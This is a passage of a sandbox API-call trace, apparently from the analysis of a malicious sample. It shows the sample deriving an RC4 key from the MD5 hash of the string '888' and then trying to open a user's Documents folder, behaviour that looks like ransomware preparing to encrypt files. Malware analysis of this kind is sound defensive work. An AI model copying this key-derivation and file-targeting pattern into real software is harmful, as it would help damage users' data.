wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0217.424] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0217.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0217.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0217.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0217.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0217.425] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0217.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.425] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0217.425] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.425] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0217.425] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.425] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.425] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.426] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0217.426] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.426] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0217.426] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0217.426] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.426] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0217.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.427] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0217.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.427] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0217.427] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0217.427] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0217.427] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.427] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0217.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0217.427] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0217.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.427] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0217.427] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.428] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0217.428] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.428] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.428] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0217.428] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.428] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0217.428] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.428] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0217.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabce0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0217.428] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0217.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0217.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72698, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0217.428] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0217.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0217.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0217.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.429] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0217.429] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.429] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0217.429] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.429] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0217.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0217.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0217.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabce0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0217.429] CryptHashData (hHash=0x9e1db8, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0217.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0217.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.022] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.022] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.022] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.022] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0218.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaba88, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0218.022] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0218.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.023] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.023] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0218.023] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.023] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0218.023] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0218.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0218.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0218.023] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0218.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866c48 [0218.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0218.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0218.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.025] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/My Music" (normalized: "c:\\users\\fd1hvy\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0218.025] GetLastError () returned 0x5 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3855010 | out: hHeap=0x2af0000) returned 1 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 